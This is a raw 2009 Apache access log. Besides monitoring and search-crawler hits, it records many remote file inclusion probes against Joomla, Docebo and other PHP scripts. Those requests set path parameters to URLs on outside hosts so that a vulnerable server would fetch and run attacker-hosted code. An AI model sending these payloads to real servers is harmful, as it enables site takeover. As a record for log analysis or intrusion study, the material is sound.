209.59.12.99 - - [21/Jun/2009:00:48:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [21/Jun/2009:00:49:00 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:00:50:04 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC44284B2B20099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:00:50:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC4428462820099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:00:50:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC442848252009FBF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:00:50:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC4428412420099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [21/Jun/2009:00:50:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC4428432A20099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.202.2.220 - - [21/Jun/2009:00:51:18 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.202.2.220 - - [21/Jun/2009:00:51:18 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/ask_password.php?dir=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.202.2.220 - - [21/Jun/2009:00:51:18 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.202.2.220 - - [21/Jun/2009:00:51:22 -0400] "GET /logs/access_log.Q109060400//skin/zero_vote/ask_password.php?dir=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.222.23.217 - - [21/Jun/2009:00:51:41 -0400] "GET /index.php?sayfa=http://dmpacking.com/bbs/data/main/mawar.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.212.27.242 - - [21/Jun/2009:00:52:12 -0400] "GET /logs/access_log.Q109061400//index.php?itemID=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.818"
66.212.27.242 - - [21/Jun/2009:00:52:12 -0400] "GET //index.php?itemID=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.818"
66.212.27.242 - - [21/Jun/2009:00:52:12 -0400] "GET /logs//index.php?itemID=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.818"
216.17.99.13 - - [21/Jun/2009:00:52:32 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:00:52:33 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:00:52:33 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.826"
83.16.182.130 - - [21/Jun/2009:00:53:10 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:53:10 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:53:10 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:13 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:13 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:13 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:13 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:53:13 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:53:13 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:53:13 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:53:14 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:15 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:16 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:16 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:16 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:17 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:17 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:17 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:17 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:18 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:18 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:19 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:19 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:19 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:19 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:19 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:19 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:19 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:20 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:20 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:20 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:20 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:20 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:53:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [21/Jun/2009:00:53:58 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:58 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:59 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:59 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:59 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:59 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:53:59 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:54:00 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:55:10 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:00:55:28 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):0494510 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.201.208.50 - - [21/Jun/2009:00:56:15 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:15 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:15 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:17 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:17 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:17 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:17 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:17 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:37 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:38 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:38 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:38 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:42 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:42 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:42 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:43 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:46 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:46 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:46 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:47 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:47 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:47 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:48 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:48 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:51 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:51 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:51 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:56:51 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:57:49 -0400] "GET /logs/access_log.Q109052500/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:57:49 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:57:49 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:57:58 -0400] "GET /logs/access_log.Q109052400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:57:59 -0400] "GET //index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:57:59 -0400] "GET /logs/access_log.Q109061400//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:58:06 -0400] "GET /logs//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:58:33 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:58:33 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:58:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.151 - - [21/Jun/2009:00:58:55 -0400] "GET /images/_notes/ace_bkgrd.jpg.mno HTTP/1.0" 200 252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
